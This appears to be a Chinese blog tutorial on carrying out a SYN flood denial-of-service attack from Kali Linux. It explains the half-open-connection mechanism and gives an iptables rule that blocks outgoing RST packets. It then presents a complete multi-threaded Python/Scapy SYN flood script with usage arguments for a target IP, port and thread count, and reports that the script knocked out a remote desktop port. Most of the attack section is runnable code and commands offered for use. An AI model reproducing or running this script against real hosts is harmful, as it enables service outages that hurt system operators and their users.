Kali ddos/DDOS 拒绝服务攻击 syn-flood 洪泛/泛洪攻击

文章介绍了Syn洪泛攻击的基本原理,即通过发送大量SYN包而不回应ACK,耗尽目标服务器资源。防御措施包括修改防火墙配置以阻止RST包。此外,文中提供了一个使用Python的Scapy库进行Syn洪泛攻击的脚本示例,展示了如何发起多线程SYN洪水攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Syn洪泛攻击:

洪泛攻击的本质是不相应B回复的SYN+ACK,导致B一直占用其系统资源,迟迟不关闭,且定时发送给A一个SYN+ACK的包,攻击方A可以控制肉鸡向B发送大量SYN消息但不响应ACK消息,或者干脆伪造SYN消息中的Source IP,使B反馈的SYN-ACK消息石沉大海,导致B被大量注定不能完成的半开连接占据,直到资源耗尽,停止响应正常的连接请求。

开始:

修改防火墙配置

# 防火墙需要进行配置,阻止RST包发出

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.21.117 -j DROP

说明:发一个包释放一个连接,这种达不到攻击郊果。要构成攻击效果可以通过iptables限止发送RST包。

然后执行脚本(脚本内容在最下面 )

python3 syn_flood.py 受害者ip 受害者端口 数量为20

 效果:

这里攻击的是3389即远程桌面的端口,我们通过win10自带的去连接,发现连接失败

至此拒绝服务攻击-泛洪攻击完成

脚本内容:

环境是python3的环境

#!/usr/bin/python
from scapy.all import*
from time import sleep
import _thread
import random
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

if len(sys.argv) != 4:
    print ("Usage - ./syn_flood.py [Target-IP] [Port Number]")
    print ("Example - ./sock_stress.py 10.0.0.5 80 20")
    print ("Example will perform a 20x multi-threaded SYN flood attack")
    print ("against the HTTP (port 80) service on 10.0.0.5")
    sys.exit()
target = str(sys.argv[1])
port= int(sys.argv[2])
threads = int(sys.argv[3])
print ("Performing SYN flood.Use Ctrl+C to stop attack")
def synflood(target,port):
    while 0 == 0:
        x = random.randint(0,65535)
        send(IP(dst=target)/TCP(dport=port,sport=x),verbose=0)

for x in range(0,threads):
    _thread.start_new_thread(synflood,(target,port))
    
while 0 == 0:
    sleep(1)

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值